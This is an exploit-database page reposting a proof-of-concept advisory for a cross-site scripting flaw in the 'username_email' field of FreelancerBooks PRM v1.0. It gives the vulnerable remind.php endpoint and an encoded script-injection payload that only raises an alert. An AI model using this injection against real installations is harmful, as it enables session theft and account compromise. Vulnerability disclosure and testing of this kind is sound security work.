Advertisement






FreelancerBooks PRM 'username_email' XSS Inj.

CVE Category Price Severity
Author Risk Exploitation Type Date
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019040117

Below is a copy:

FreelancerBooks PRM 'username_email' XSS Inj.
===========================================================================================
# Exploit Title: FreelancerBooks PRM 'username_email' XSS Inj.
# Dork: N/A
# Date: 06-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.freelancerbooks.com/
# Software Link: https://sourceforge.net/projects/freelancerbooks/files/
# Version: v1.0
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: FreelancerBooks is a free web-based project management system written in PHP with MySQL database back end.
  FreelancerBooks was initially designed for freelancers and agencies
  but it can be used for any professional service provider/organization.
===========================================================================================
# POC - XSS
# Parameters : username_email
# Attack Pattern : %3cscRipt%3ealert(0x00B9A7)%3c%2fscRipt%3e
# POST Method : http://localhost/FreelancerBooks/freelancer/remind.php  
===========================================================================================

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum